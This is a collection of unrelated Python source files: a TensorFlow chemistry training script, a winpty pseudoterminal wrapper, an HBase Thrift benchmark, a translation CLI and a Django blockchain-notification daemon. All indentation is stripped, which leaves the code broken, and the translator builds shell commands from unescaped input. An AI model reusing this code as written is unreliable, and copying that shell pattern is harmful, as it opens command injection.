opts,args = parser.parse_args()
hidden_size = int(opts.hidden_size)
depth = int(opts.depth)
core_size = int(opts.core_size)
cutoff = int(opts.cand_size)
max_norm = float(opts.max_norm)
batch_size = int(opts.batch_size)
session = tf.Session()
_input_atom = tf.placeholder(tf.float32, [None, None, adim])
_input_bond = tf.placeholder(tf.float32, [None, None, bdim])
_atom_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_bond_graph = tf.placeholder(tf.int32, [None, None, max_nb, 2])
_num_nbs = tf.placeholder(tf.int32, [None, None])
_label = tf.placeholder(tf.int32, [None])
_src_holder = [_input_atom, _input_bond, _atom_graph, _bond_graph, _num_nbs, _label]
q = tf.FIFOQueue(100, [tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.int32])
enqueue = q.enqueue(_src_holder)
input_atom, input_bond, atom_graph, bond_graph, num_nbs, label = q.dequeue()
input_atom.set_shape([None, None, adim])
input_bond.set_shape([None, None, bdim])
atom_graph.set_shape([None, None, max_nb, 2])
bond_graph.set_shape([None, None, max_nb, 2])
num_nbs.set_shape([None, None])
label.set_shape([None])
graph_inputs = (input_atom, input_bond, atom_graph, bond_graph, num_nbs)
with tf.variable_scope("mol_encoder"):
fp_all_atoms = rcnn_wl_only(graph_inputs, hidden_size=hidden_size, depth=depth)
reactant = fp_all_atoms[0:1,:]
candidates = fp_all_atoms[1:,:]
candidates = candidates - reactant
candidates = tf.concat(0, [reactant, candidates])
with tf.variable_scope("diff_encoder"):
reaction_fp = wl_diff_net(graph_inputs, candidates, hidden_size=hidden_size, depth=1)
reaction_fp = reaction_fp[1:]
reaction_fp = tf.nn.relu(linear(reaction_fp, hidden_size, "rex_hidden"))
score = tf.squeeze(linear(reaction_fp, 1, "score"), [1])
loss = tf.nn.softmax_cross_entropy_with_logits(score, label)
pred = tf.argmax(score, 0)
_lr = tf.placeholder(tf.float32, [])
optimizer = tf.train.AdamOptimizer(learning_rate=_lr)
tvs = tf.trainable_variables()
param_norm = tf.global_norm(tvs)
grads_and_vars = optimizer.compute_gradients(loss, tvs)
grads, var = zip(*grads_and_vars)
grad_norm = tf.global_norm(grads)
new_grads, _ = tf.clip_by_global_norm(grads, max_norm)
accum_grads = [tf.Variable(tf.zeros(v.get_shape().as_list()), trainable=False) for v in tvs]
zero_ops = [v.assign(tf.zeros(v.get_shape().as_list())) for v in accum_grads]
accum_ops = [accum_grads[i].assign_add(grad) for i, grad in enumerate(new_grads)]
grads_and_vars = zip(accum_grads, var)
backprop = optimizer.apply_gradients(grads_and_vars)
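# Gradient accumulation: the per-variable buffers above are zeroed with zero_ops, filled over a
# mini-batch of examples with accum_ops (using the clipped gradients), and then applied in a
# single optimizer step (backprop) in the training loop below.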
tf.global_variables_initializer().run(session=session)
size_func = lambda v: reduce(lambda x, y: x*y, v.get_shape().as_list())
n = sum(size_func(v) for v in tf.trainable_variables())
print "Model size: %dK" % (n/1000,)
def count(s):
c = 0
for i in xrange(len(s)):
if s[i] == ':':
c += 1
return c
def read_data(coord):
data = []
train_f = open(opts.train_path, 'r')
cand_f = open(opts.cand_path, 'r')
for line in train_f:
r,e = line.strip("\r\n ").split()
cand = cand_f.readline()
cbonds = []
for b in e.split(';'):
x,y = b.split('-')
x,y = int(x)-1,int(y)-1
cbonds.append((x,y))
sbonds = set(cbonds)
for b in cand.strip("\r\n ").split():
x,y = b.split('-')
x,y = int(x)-1,int(y)-1
if (x,y) not in sbonds:
cbonds.append((x,y))
data.append((r,cbonds))
random.shuffle(data)
data_len = len(data)
it = 0
while True:
reaction, cand_bonds = data[it]
cand_bonds = cand_bonds[:core_size]
it = (it + 1) % data_len
r,_,p = reaction.split('>')
n = count(r)
if n <= 2 or n > 100: continue
src_tuple,_ = smiles2graph(r, p, cand_bonds, cutoff=cutoff)
feed_map = {x:y for x,y in zip(_src_holder, src_tuple)}
session.run(enqueue, feed_dict=feed_map)
coord.request_stop()
coord = tf.train.Coordinator()
t = threading.Thread(target=read_data, args=(coord,))
t.start()
saver = tf.train.Saver()
it, sum_acc, sum_err, sum_gnorm = 0, 0.0, 0.0, 0.0
lr = 0.001
try:
while not coord.should_stop():
it += batch_size
session.run(zero_ops)
for i in xrange(batch_size):
ans = session.run(accum_ops + [pred])
if ans[-1] != 0:
sum_err += 1.0
_, pnorm, gnorm = session.run([backprop, param_norm, grad_norm], feed_dict={_lr:lr})
sum_gnorm += gnorm
if it % 200 == 0 and it > 0:
print "Training Error: %.4f, Param Norm: %.2f, Grad Norm: %.2f" % (sum_err / 200, pnorm, sum_gnorm / 200 * batch_size)
sys.stdout.flush()
sum_err, sum_gnorm = 0.0, 0.0
if it % 40000 == 0 and it > 0:
saver.save(session, opts.save_path + "/model.ckpt-%d" % it)
lr *= 0.9
print "Learning Rate: %.6f" % lr
except Exception as e:
print e
coord.request_stop(e)
finally:
saver.save(session, opts.save_path + "/model.final")
coord.request_stop()
coord.join([t])
|
ptyprocess.py
|
# -*- coding: utf-8 -*-
# Standard library imports
import codecs
import os
import shlex
import signal
import socket
import subprocess
import threading
import time
# Local imports
from .winpty_wrapper import PTY, PY2
try:
from shutil import which
except ImportError:
from backports.shutil_which import which
class PtyProcess(object):
"""This class represents a process running in a pseudoterminal.
The main constructor is the :meth:`spawn` classmethod.
"""
def __init__(self, pty):
assert isinstance(pty, PTY)
self.pty = pty
self.pid = pty.pid
self.closed = False
self.flag_eof = False
self.decoder = codecs.getincrementaldecoder('utf-8')(errors='strict')
# Used by terminate() to give kernel time to update process status.
# Time in seconds.
self.delayafterterminate = 0.1
# Used by close() to give kernel time to update process status.
# Time in seconds.
self.delayafterclose = 0.1
# Set up our file reader sockets.
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
address = _get_address()
self._server.bind(address)
self._server.listen(1)
# Read from the pty in a thread.
self._thread = threading.Thread(
target=_read_in_thread, args=(address, self.pty)
)
self._thread.setDaemon(True)
self._thread.start()
self.fileobj, _ = self._server.accept()
self.fd = self.fileobj.fileno()
@classmethod
def spawn(cls, argv, cwd=None, env=None, dimensions=(24, 80)):
"""Start the given command in a child process in a pseudo terminal.
        This does all the setting up of the pty and returns an instance of
        PtyProcess.
        Dimensions of the pseudoterminal used for the subprocess can be
specified as a tuple (rows, cols), or the default (24, 80) will be
used.
"""
if isinstance(argv, str):
argv = shlex.split(argv, posix=False)
if not isinstance(argv, (list, tuple)):
raise TypeError("Expected a list or tuple for argv, got %r" % argv)
# Shallow copy of argv so we can modify it
argv = argv[:]
command = argv[0]
env = env or os.environ
path = env.get('PATH', os.defpath)
command_with_path = which(command, path=path)
if command_with_path is None:
raise FileNotFoundError(
'The command was not found or was not ' +
'executable: %s.' % command
)
command = command_with_path
argv[0] = command
cmdline = ' ' + subprocess.list2cmdline(argv[1:])
cwd = cwd or os.getcwd()
proc = PTY(dimensions[1], dimensions[0])
        # Create the environment string.
envStrs = []
for (key, value) in env.items():
envStrs.append('%s=%s' % (key, value))
env = '\0'.join(envStrs) + '\0'
if PY2:
command = _unicode(command)
cwd = _unicode(cwd)
cmdline = _unicode(cmdline)
env = _unicode(env)
if len(argv) == 1:
proc.spawn(command, cwd=cwd, env=env)
else:
proc.spawn(command, cwd=cwd, env=env, cmdline=cmdline)
inst = cls(proc)
inst._winsize = dimensions
# Set some informational attributes
inst.argv = argv
if env is not None:
inst.env = env
if cwd is not None:
inst.launch_dir = cwd
return inst
@property
def exitstatus(self):
"""The exit status of the process.
"""
return self.pty.exitstatus
def fileno(self):
"""This returns the file descriptor of the pty for the child.
"""
return self.fd
def close(self, force=False):
"""This closes the connection with the child application. Note that
calling close() more than once is valid. This emulates standard Python
behavior with files. Set force to True if you want to make sure that
the child is terminated (SIGKILL is sent if the child ignores
SIGINT)."""
if not self.closed:
self.pty.close()
self.fileobj.close()
self._server.close()
# Give kernel time to update process status.
time.sleep(self.delayafterclose)
if self.isalive():
if not self.terminate(force):
raise IOError('Could not terminate the child.')
self.fd = -1
self.closed = True
del self.pty
self.pty = None
def __del__(self):
"""This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it.
"""
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
try:
self.close()
except Exception:
pass
def flush(self):
"""This does nothing. It is here to support the interface for a
File-like object. """
pass
def isatty(self):
"""This returns True if the file descriptor is open and connected to a
tty(-like) device, else False."""
return self.isalive()
def read(self, size=1024):
"""Read and return at most ``size`` characters from the pty.
Can block if there is nothing to read. Raises :exc:`EOFError` if the
terminal was closed.
"""
data = self.fileobj.recv(size)
if not data:
self.flag_eof = True
raise EOFError('Pty is closed')
return self.decoder.decode(data, final=False)
def readline(self):
"""Read one line from the pseudoterminal as bytes.
Can block if there is nothing to read. Raises :exc:`EOFError` if the
terminal was closed.
"""
buf = []
while 1:
try:
ch = self.read(1)
except EOFError:
return ''.join(buf)
buf.append(ch)
if ch == '\n':
return ''.join(buf)
def write(self, s):
"""Write the string ``s`` to the pseudoterminal.
Returns the number of bytes written.
"""
if not self.isalive():
raise EOFError('Pty is closed')
if PY2:
s = _unicode(s)
success, nbytes = self.pty.write(s)
if not success:
raise IOError('Write failed')
return nbytes
def terminate(self, force=False):
"""This forces a child process to terminate."""
if not self.isalive():
return True
self.kill(signal.SIGINT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
if force:
self.kill(signal.SIGKILL)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
def wait(self):
"""This waits until the child exits. This is a blocking call. This will
not read any data from the child.
"""
while self.isalive():
time.sleep(0.1)
return self.exitstatus
def isalive(self):
"""This tests if the child process is running or not. This is
non-blocking. If the child was terminated then this will read the
exitstatus or signalstatus of the child. This returns True if the child
process appears to be running or False if not.
"""
return self.pty and self.pty.isalive()
def kill(self, sig=None):
"""Kill the process with the given signal.
"""
os.kill(self.pid, sig)
def sendcontrol(self, char):
'''Helper method that wraps send() with mnemonic access for sending control
character to the child (such as Ctrl-C or Ctrl-D). For example, to send
Ctrl-G (ASCII 7, bell, '\a')::
child.sendcontrol('g')
See also, sendintr() and sendeof().
'''
char = char.lower()
a = ord(char)
if 97 <= a <= 122:
a = a - ord('a') + 1
byte = bytes([a])
return self.pty.write(byte.decode('utf-8')), byte
d = {
'@': 0,
'`': 0,
'[': 27,
'{': 27,
'\\': 28,
'|': 28,
']': 29,
'}': 29,
'^': 30,
'~': 30,
'_': 31,
'?': 127
}
if char not in d:
return 0, b''
byte = bytes([d[char]])
return self.pty.write(byte.decode('utf-8')), byte
def sendeof(self):
"""This sends an EOF to the child. This sends a character which causes
the pending parent output buffer to be sent to the waiting child
program without waiting for end-of-line. If it is the first character
of the line, the read() in the user program returns 0, which signifies
end-of-file. This means to work as expected a sendeof() has to be
called at the beginning of a line. This method does not send a newline.
It is the responsibility of the caller to ensure the eof is sent at the
beginning of a line."""
# Send control character 4 (Ctrl-D)
        self.pty.write('\x04')
def sendintr(self):
"""This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. """
# Send control character 3 (Ctrl-C)
        self.pty.write('\x03')
def eof(self):
"""This returns True if the EOF exception was ever raised.
"""
return self.flag_eof
def getwinsize(self):
"""Return the window size of the pseudoterminal as a tuple (rows, cols).
"""
return self._winsize
def setwinsize(self, rows, cols):
"""Set the terminal window size of the child tty.
"""
self._winsize = (rows, cols)
self.pty.set_size(cols, rows)
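# Example (a minimal usage sketch, not part of the original module; assumes the winpty
# backend is available and "python" is on PATH):
#
#     proc = PtyProcess.spawn(['python', '-c', 'print("hello")'])
#     while True:
#         try:
#             print(proc.read(), end='')
#         except EOFError:
#             break
#     proc.wait()
#     proc.close()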
def _read_in_thread(address, pty):
"""Read data from the pty in a thread.
"""
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(address)
while 1:
data = pty.read(4096)
if not data and not pty.isalive():
while not data and not pty.iseof():
time.sleep(0.1)
data += pty.read(4096)
if not data:
try:
client.send(b'')
except socket.error:
pass
break
try:
client.send(data)
except socket.error:
break
client.close()
def _get_address(default_port=20128):
"""Find and return a non used port"""
while True:
try:
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP
)
sock.bind(("127.0.0.1", default_port))
except socket.error as _msg: # analysis:ignore
default_port += 1
else:
break
finally:
sock.close()
sock = None
return ("127.0.0.1", default_port)
def _unicode(s):
"""Ensure that a string is Unicode on Python 2.
"""
if isinstance(s, unicode): # noqa E891
return s
return s.decode('utf-8')
|
thrift_test.py
|
# encoding=utf-8
from timer import Timer
import time
import random
from multiprocessing import Process
'''
This script is a trial of connecting to and operating an HBase database from Python via Thrift.
prepare:
1. Start the ThriftServer on HBASE
   > hbase-daemon.sh start thrift/thrift2
   > HBASE provides two servers, thrift and thrift2. For various reasons their syntax is not compatible;
     thrift2 has the more elegant wrapping, but some DDL operations are incomplete, and there is more
     documentation for the thrift API, so thrift is tried first here.
2. jps should show a ThriftServer process
3. Python needs the thrift and hbase modules. With network access, just pip install them; without network
   access, download the same versions of the module code and reference them with sys.path.append('PATH').
   Installed code usually lives in $PYTHON_HOME/Lib/site-packages
   > pip install thrift
     pip install hbase-thrift
'''
from thrift import Thrift
from thrift.transport import TSocket, TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
import sys
'''
# Server-side address and port; "web" is the HMaster, i.e. the thriftServer hostname, and 9090 is the thriftServer default port
transport = TSocket.TSocket('192.168.5.48', 6666)
# A timeout can be set
transport.setTimeout(5000)
# Set the transport type (TFramedTransport or TBufferedTransport)
trans = TTransport.TBufferedTransport(transport)
# Set the transport protocol
protocol = TBinaryProtocol.TBinaryProtocol(trans)
# Build the client
client = Hbase.Client(protocol)
# Open the connection
transport.open()
'''
from hbase.ttypes import ColumnDescriptor, Mutation, BatchMutation, TRegionInfo
from hbase.ttypes import IOError, AlreadyExists
tableName = "users"
rowkey = "58339"
# Get all table names
'''
tableNames = client.getTableNames()
print('tableNames:',tableNames)
# Get the column families, returned as a map
columnDescriptors = client.getColumnDescriptors(tableName)
print("columnName",columnDescriptors)
# Get all Regions of the table, including start/end keys etc., returned as a list
tableRegions = client.getTableRegions(tableName)
'''
# Get a row (tableName, rowKey), returns List<TRowResult>
'''
timer = Timer()
timer.stage_begin('get row')
row = client.getRow(tableName,rowkey)
'''
#print("row:",row)
# Get a single column of the row
#timer.stage_begin('get col')
#rowColumn = client.get(tableName,rowkey,"cf:content")
#print("rowColumn",len(rowColumn) )
# Get the latest-timestamp values of multiple columns of the row; None means all columns
#rowColumns = client.getRowWithColumns(tableName,rowkey,["bbdi:openId","bbdi:tempLogId"])
#print("rowColumns",rowColumns)
# client.mutateRow(tableName[1],"jason",)
'''
# Create a table
try:
    # Create a column family; only the first parameter, name, is passed here
struct ColumnDescriptor {
1:Text name,
2:i32 maxVersions = 3,
3:string compression = "NONE",
4:bool inMemory = 0,
5:string bloomFilterType = "NONE",
6:i32 bloomFilterVectorSize = 0,
7:i32 bloomFilterNbHashes = 0,
8:bool blockCacheEnabled = 0,
9:i32 timeToLive = -1
}
desc = ColumnDescriptor(name="colNameTest1")
    # Create the table (tableName, [column families])
client.createTable('our_table1', [desc])
print client.getTableNames()
except AlreadyExists, tx:
print "Thrift exception"
print '%s' % (tx.message)
'''
'''
# Insert a row
timer.stage_begin('put')
content = open('1_2_3.jpeg').read()
print len(content)
mutations = [Mutation(column="cf:content", value=content)]
client.mutateRow("users","12345",mutations)
timer.finish()
print timer.dump()
sys.exit(0)
# Insert multiple rows
rowMutations = [BatchMutation("rowkey1",mutations),BatchMutation("rowkey2",mutations)]
client.mutateRows("our_table1",rowMutations)
# Delete a row
client.deleteAllRow("our_table1","rowkey2")
# scan
# ScannerID scannerOpen(Text tableName, Text startRow, list<Text> columns)
scanId = client.scannerOpen("our_table1","",["colNameTest1"])
scanRescult = client.scannerGet(scanId) # Fetch one result from the scan
scanRescult1 = client.scannerGetList(scanId,50) # Fetch multiple results; rows already fetched above on the same scan id are not returned again
print(scanRescult)
print(scanRescult1)
# Close the scanner
client.scannerClose(scanId);
'''
content = open('1_2_3.jpeg').read()
def put_one(key, client):
timer = Timer()
timer.stage_begin('put')
#content = open('1_2_3.jpeg').read()
print len(content)
print "cf:content"
mutations = [Mutation(column="cf:content", value=content)]
client.mutateRow("users", key, mutations)
timer.finish()
print timer.dump()
def task(msg):
for i in range(int(sys.argv[2])):
key = str(random.randint(0, 100000))
put_one(key)
def main1():
plist = []
beg = time.time()
num_task = int(sys.argv[1])
num_row = int(sys.argv[2])
for i in range(num_task):
p = Process(target=task, args=('world',))
plist.append(p)
p.start()
for p in plist:
p.join()
end = time.time()
print end - beg
print (end - beg) / num_task / num_row
print 1.06 * num_task * num_row / (end - beg) * 8
class WriteProcess(Process):
def run(self):
        # Server-side address and port; "web" is the HMaster, i.e. the thriftServer hostname, and 9090 is the thriftServer default port
        transport = TSocket.TSocket('localhost', 6666)
        #transport = TSocket.TSocket('localhost', 6666)
        # A timeout can be set
        #transport.setTimeout(8000)
        # Set the transport type (TFramedTransport or TBufferedTransport)
        trans = TTransport.TBufferedTransport(transport)
        # Set the transport protocol
        protocol = TBinaryProtocol.TBinaryProtocol(trans)
        # Build the client
        client = Hbase.Client(protocol)
        # Open the connection
        transport.open()
total = 0.
for i in range(int(sys.argv[2])):
key = str(random.randint(0, 10000))
key = str(i)
beg = time.time()
put_one(key, client)
end = time.time()
total += end - beg
print 'total:', total
print 'avg:', total / int(sys.argv[2])
def get_row(table, rowkey, client):
timer = Timer()
#timer.stage_begin('get row')
#row = client.getRow(tableName,rowkey)
timer.stage_begin('get col')
rowColumn = client.get(table, rowkey, "cf:content")
print len(rowColumn)
if rowColumn:
print 'content len', len(rowColumn[0].value)
timer.finish()
print timer.dump()
class ReadProcess(Process):
def __init__(self):
Process.__init__(self)
#self.total = 0.0
def run(self):
        # Server-side address and port; "web" is the HMaster, i.e. the thriftServer hostname, and 9090 is the thriftServer default port
        transport = TSocket.TSocket('localhost', 6666)
        # A timeout can be set
        transport.setTimeout(5000)
        # Set the transport type (TFramedTransport or TBufferedTransport)
        trans = TTransport.TBufferedTransport(transport)
        # Set the transport protocol
        protocol = TBinaryProtocol.TBinaryProtocol(trans)
        # Build the client
        client = Hbase.Client(protocol)
        # Open the connection
        transport.open()
total = 0.0
for i in range(int(sys.argv[2])):
key = str(i)
key = str(random.randint(0, 1999))
beg = time.time()
get_row('users', key, client)
end = time.time()
total += end - beg
print 'total:', total
print 'avg:', total / int(sys.argv[2])
def main():
plist = []
beg = time.time()
num_task = int(sys.argv[1])
num_row = int(sys.argv[2])
for i in range(num_task):
p = ReadProcess()
p = WriteProcess()
plist.append(p)
for p in plist:
p.start()
for p in plist:
p.join()
total = 0.0
end = time.time()
print end - beg
print (end - beg) / num_task / num_row
print 'avg tps', num_task * num_row / (end - beg)
print 1.06 * num_task * num_row / (end - beg) * 8
if __name__ == '__main__':
main()
|
translate_py3.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*
import os
import argparse
import dbm
import re
from multiprocessing.dummy import Pool as ThreadPool
from multiprocessing import Process
class Bing(object):
def __init__(self):
super(Bing, self).__init__()
def query(self, word):
import requests
from bs4 import BeautifulSoup
sess = requests.Session()
headers = {
'Host': 'cn.bing.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
}
sess.headers.update(headers)
url = 'http://cn.bing.com/dict/SerpHoverTrans?q=%s' % (word)
try:
resp = sess.get(url, timeout=100)
except:
return None
text = resp.text
if (resp.status_code == 200) and (text):
soup = BeautifulSoup(text, 'lxml')
if soup.find('h4').text.strip() != word:
return None
lis = soup.find_all('li')
trans = []
for item in lis:
transText = item.get_text()
if transText:
trans.append(transText)
return '\n'.join(trans)
else:
return None
class Youdao(object):
def __init__(self):
super(Youdao, self).__init__()
def query(self, word):
import requests
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
sess = requests.Session()
headers = {
'Host': 'dict.youdao.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate'
}
sess.headers.update(headers)
url = 'http://dict.youdao.com/fsearch?q=%s' % (word)
try:
resp = sess.get(url, timeout=100)
except:
return None
text = resp.content
if (resp.status_code == 200) and (text):
tree = ET.ElementTree(ET.fromstring(text))
returnPhrase = tree.find('return-phrase')
if returnPhrase.text.strip() != word:
return None
customTranslation = tree.find('custom-translation')
if not customTranslation:
return None
trans = []
for t in customTranslation.findall('translation'):
transText = t[0].text
if transText:
trans.append(transText)
return '\n'.join(trans)
else:
return None
class Iciba(object):
def __init__(self):
super(Iciba, self).__init__()
def query(self, word):
import requests
from bs4 import BeautifulSoup
sess = requests.Session()
headers = {
'Host': 'open.iciba.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate'
}
sess.headers.update(headers)
url = 'http://open.iciba.com/huaci_new/dict.php?word=%s' % (word)
try:
resp = sess.get(url, timeout=100)
text = resp.text
pattern = r'(<div class=\\\"icIBahyI-group_pos\\\">[\s\S]+?</div>)'
text = re.search(pattern, text).group(1)
except:
return None
if (resp.status_code == 200) and (text):
soup = BeautifulSoup(text, 'lxml')
ps = soup.find_all('p')
trans = []
for item in ps:
transText = item.get_text()
transText = re.sub(
r'\s+', ' ', transText.replace('\t', '')).strip()
if transText:
trans.append(transText)
return '\n'.join(trans)
else:
return None
path = os.path.dirname(os.path.realpath(__file__))
DEFAULT_SERVICE = 'bing'
class Client(object):
def __init__(self, word, service=None, webonly=False):
super(Client, self).__init__()
if not service:
service = DEFAULT_SERVICE
self.service = service
self.word = word
self.trans = None
if webonly:
self.db = {}
else:
self.db = dbm.open(path + '/data/vocabulary', 'c')
def translate(self):
trans = self.db.get(self.word)
if trans:
return trans.decode('utf-8')
else:
if self.service == 'bing':
S = Bing()
            elif self.service == 'youdao':
S = Youdao()
elif self.service == 'iciba':
S = Iciba()
trans = S.query(self.word)
self.trans = trans
return trans
def suggest(self):
if re.sub(r'[a-zA-Z\d\'\-\.\s]', '', self.word):
return None
import enchant
try:
d = enchant.DictWithPWL(
'en_US', path + '/data/spell-checker/american-english-large')
except:
d = enchant.Dict('en_US')
suggestion = d.suggest(self.word)
return suggestion
def pronounce(self, tts):
if tts == 'festival':
cmd = ' echo "%s" | festival --tts > /dev/null 2>&1' % (self.word)
elif tts == 'espeak':
cmd = 'espeak -v en-us "%s" > /dev/null 2>&1' % (self.word)
elif tts == 'real':
cmd = 'find %s/data/RealPeopleTTS/ -type f -iname "%s.wav" | head -n1 | xargs -I {} aplay {} > /dev/null 2>&1' % (
path, self.word)
        import subprocess
        try:
            status, output = subprocess.getstatusoutput(cmd)
except:
pass
return True
def updateDB(self):
if self.trans:
self.db[self.word] = self.trans.encode('utf-8')
self.db.close()
return True
def parseArgs():
parser = argparse.ArgumentParser()
#parser.add_argument('word', help="word or 'some phrase'")
parser.add_argument('-n', '--nostorage', dest='nostorage',
action='store_true', help='turn off data storage')
parser.add_argument('-p', '--pronounce', dest='pronounce', choices=[
'espeak', 'festival', 'real'], help="text-to-speech software: 'espeak', 'festival' or 'real'")
parser.add_argument('-s', '--service', dest='service', choices=[
'bing', 'youdao', 'iciba'], help="translate service: 'bing', 'youdao' or 'iciba'")
parser.add_argument('-w', '--webonly', dest='webonly',
action='store_true', help='ignore local data')
parser.add_argument('-V', '--version', action='version',
version='%(prog)s 0.1.3')
return parser.parse_args()
if __name__ == '__main__':
args = parseArgs()
word = 'hello' #args.word.strip()
service = args.service
webonly = args.webonly
if service:
webonly = True
C = Client(word, service=service, webonly=webonly)
pool = ThreadPool()
_trans = pool.apply_async(C.translate)
_suggestion = pool.apply_async(C.suggest)
trans = _trans.get()
if trans:
if args.pronounce:
p1 = Process(target=C.pronounce, args=(args.pronounce,))
p1.daemon = True
p1.start()
if not args.nostorage:
p2 = Process(target=C.updateDB)
p2.daemon = True
p2.start()
else:
suggestion = _suggestion.get()
if not suggestion:
            print('No translations found for "%s".' % (word))
        else:
            print('No translations found for "%s", maybe you meant:\n\n%s'
                  % (word, ' / '.join(suggestion)))
|
daemon.py
|
import logging
import time
from django.conf import settings
from django.db import connections, connection
from django.db.models import F
from django.utils import timezone
from threading import Thread
from gcoinrpc import connect_to_remote
import requests
from notification.models import AddressSubscription, TxSubscription
from notification.models import AddressNotification, TxNotification
from notification.models import LastSeenBlock
logger = logging.getLogger(__name__)
RETRY_TIMES = 5
SLEEP_TIME = 5
def close_connection():
for conn in connections.all():
conn.close_if_unusable_or_obsolete()
connection.close()
def get_rpc_connection():
return connect_to_remote(settings.BITCOIN_RPC['user'],
settings.BITCOIN_RPC['password'],
settings.BITCOIN_RPC['host'],
settings.BITCOIN_RPC['port'])
class BitcoinRPCMixin(object):
def __init__(self):
self.conn = get_rpc_connection()
def get_block(self, block_hash):
return self.conn.getblock(block_hash)
def get_best_block(self):
return self.get_block(self.conn.getbestblockhash())
def get_transaction(self, tx_hash):
return self.conn.getrawtransaction(tx_hash)
class TxNotifyDaemon(BitcoinRPCMixin):
def __init__(self):
super(TxNotifyDaemon, self).__init__()
self.last_seen_block = None
def call_request(self, post_data, notification):
headers = {'content-type': "application/x-www-form-urlencoded"}
try:
response = requests.post(notification.subscription.callback_url,
headers=headers,
data=post_data
)
close_connection()
if response.status_code == 200:
TxNotification.objects.filter(id=notification.id).update(
is_notified=True,
notification_attempts=F('notification_attempts') + 1,
notification_time=timezone.now()
)
else:
TxNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error("Request url: {}".format(notification.subscription.callback_url))
logger.error("Notification id: {}".format(notification.id))
try:
TxNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error(e)
def start_notify(self, notifications):
if notifications.count() == 0:
return
for notification in notifications:
post_data = {
'notification_id': notification.id,
'subscription_id': notification.subscription.id,
'tx_hash': notification.subscription.tx_hash,
}
thread = Thread(target=self.call_request, args=(post_data, notification, ))
thread.start()
def run_forever(self, test=False):
while True:
try:
best_block = self.get_best_block()
if self.last_seen_block is None or self.last_seen_block['hash'] != best_block['hash']:
new_notifications = []
tx_subscriptions = TxSubscription.objects.filter(txnotification=None)
for tx_subscription in tx_subscriptions:
logger.debug('check tx hash: {}'.format(tx_subscription.tx_hash))
try:
tx = self.get_transaction(tx_subscription.tx_hash)
if hasattr(tx, 'confirmations') and tx.confirmations >= tx_subscription.confirmation_count:
new_notifications.append(TxNotification(subscription=tx_subscription))
except Exception as e:
# transaction does not exist
continue
TxNotification.objects.bulk_create(new_notifications)
notifications = TxNotification.objects.filter(is_notified=False,
notification_attempts__lt=RETRY_TIMES)
self.start_notify(notifications)
self.last_seen_block = best_block
except Exception as e:
logger.error(e)
if test:
return
close_connection()
time.sleep(SLEEP_TIME)
class AddressNotifyDaemon(BitcoinRPCMixin):
def call_request(self, post_data, notification):
headers = {'content-type': "application/x-www-form-urlencoded"}
try:
response = requests.post(notification.subscription.callback_url,
headers=headers,
data=post_data
)
close_connection()
if response.status_code == 200:
AddressNotification.objects.filter(id=notification.id).update(
is_notified=True,
notification_attempts=F('notification_attempts') + 1,
notification_time=timezone.now()
)
else:
AddressNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error(e)
logger.error("Request url: {}".format(notification.subscription.callback_url))
logger.error("Notification id: {}".format(notification.id))
try:
AddressNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error(e)
def start_notify(self):
notifications = AddressNotification.objects.filter(is_notified=False, notification_attempts__lt=RETRY_TIMES).prefetch_related('subscription')
notifications = list(notifications)
for notification in notifications:
post_data = {
'notification_id': notification.id,
'subscription_id': notification.subscription.id,
'tx_hash': notification.tx_hash,
}
thread = Thread(target=self.call_request, args=(post_data, notification,))
thread.start()
def run_forever(self):
while True:
try:
# get new blocks since last round
new_blocks = self.get_new_blocks()
if new_blocks:
# create a address -> txs map from new blocks
for block in new_blocks:
addr_txs_map = self.create_address_txs_map(block)
if bool(addr_txs_map):
# create AddressNotification instance in database
self.create_notifications(addr_txs_map)
self.start_notify()
self.set_last_seen_block(block['hash'])
except Exception as e:
logger.error(e)
close_connection()
time.sleep(SLEEP_TIME)
def get_new_blocks(self):
"""
Get new blocks since last update
"""
last_seen_block = self.get_last_seen_block()
best_block = self.get_best_block()
if last_seen_block['confirmations'] < 1:
# fork happened, find the branching point and set it as last seen block
block = last_seen_block
while block['confirmations'] < 1:
block = self.get_block(block['previousblockhash'])
last_seen_block = block
# find all new blocks since last seen block in main chain
block = best_block
new_blocks = []
if block['hash'] == last_seen_block['hash']:
return new_blocks
while block['hash'] != last_seen_block['hash']:
new_blocks.append(block)
block = self.get_block(block['previousblockhash'])
return new_blocks[::-1]
def create_address_txs_map(self, block):
addr_txs_map = {}
# Note: this for loop can be optimized if core supports rpc to get all tx in a block
try:
for tx_hash in block['tx']:
tx = self.get_transaction(tx_hash)
